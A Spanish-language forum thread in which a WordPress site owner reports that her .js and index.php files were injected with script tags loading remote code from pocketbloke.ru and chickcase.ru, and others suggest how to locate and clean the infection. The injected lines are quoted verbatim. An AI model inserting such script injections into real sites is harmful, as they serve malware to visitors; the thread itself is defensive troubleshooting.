mi web llena de código malicioso

Google bloqueo mi pagina por codigo malicioso y no me extraña.

Casi todas mis archivos .js tenian este código:

document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/Index.js"></scri'+'pt>');

y en bastantes index.php de mi blog he encontrado:

<script type="text/javascript" src="http://chickcase.ru/Index.js"></script>
<!--33d8d3fcf9075b01d69d13951a96dbda--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

crei q los había eliminado todos pero al acceder a mi pagina (saltandome el aviso) sigue apareciendo en la barra de estado esperando a chickcase.ru...

cómo hago para saber donde estan el resto de los codigos maliciosos sin tener q revisar archivo por archivo??

soy un poco inexperta, tengo miedo de no descubrir el código malicioso.

Si usas algun IDE, puedes crear un nuevo proyecto y hacer una busqueda del texto que quieres encontrar, en este caso, yo buscaria primero por la palabra '.ru/'

Tambien puedes usar la busqueda por texto de tu sistema operativo.

Por cierto, una vez quites todo el script malicioso, actualiza la version de wordpress y cambia la contraseña, por seguridad mas que nada.

he hecho una busqueda intensiva y he sacado de todo.

he visto que en todos los achivos llamado index o indexalgo punto lo q sea aparecia lo de chickcase en el principio de la pagina, y en el footer de mi template, aparece al final.
Y en practicamente todos los .js lo de pocketbloke al final.

Creo q lo de pocketbloke esta solucionado porque no aparece en la barra de estado, pero no estoy segura. En cualquier caso chickcase sigue apareciendo,y no se ya donde buscar!

¿Hay algun archivo en wordpress que sirva para meter ese codigo en la cabezera de mis paginas? he mirado el htaccess y no dice nada raro, el template, por todos lados... nada.

El google webmaster tool me dice q estas son algunas de las URL problematicas:

/
/category/
/se-alquila-el-atico/
/category/portafolio/
/tag/tributos/
/category/portafolio/tienda-shop/

pero no corresponden con carpetas, son friendly URL, no sé donde buscar!

ayuda!

ACTUALIZACION
**** He actualizado Wordpress y sigue saliendo :S

No lo entiendoooo

Usas avira? A mi me dice lo mismo de mi web, pero he revisado todos los archivos del theme y está todo limpio. He añadido mi web a http://www.virustotal.com/ y al escanearla sigue saliendo solo con el avira. En mi caso empiezo a pensar que es una rayada del antivirus. En el tuyo te recomiendo que la escanees a ver si alguno más te dice algo. Cuando la añadas y scanees dale a " View downloaded file analysis"

Es posible que si wordpress, antes de mostrar la pagina, accede a la base de datos para insertar algo en el template, esté ahi modificado tambien. No lo se, ya que no uso wordpress, pero, yo de ti, haria un backup de la base de datos, e instalaria de nuevo wordpress, con la instalacion limpia, haces un escaneo, si no hay nada, recuperas la base de datos y escaneas, si no hay nada bien, si encuentra algo, pues el problema esta en la base de datos. Al menos, ya sabras donde buscar.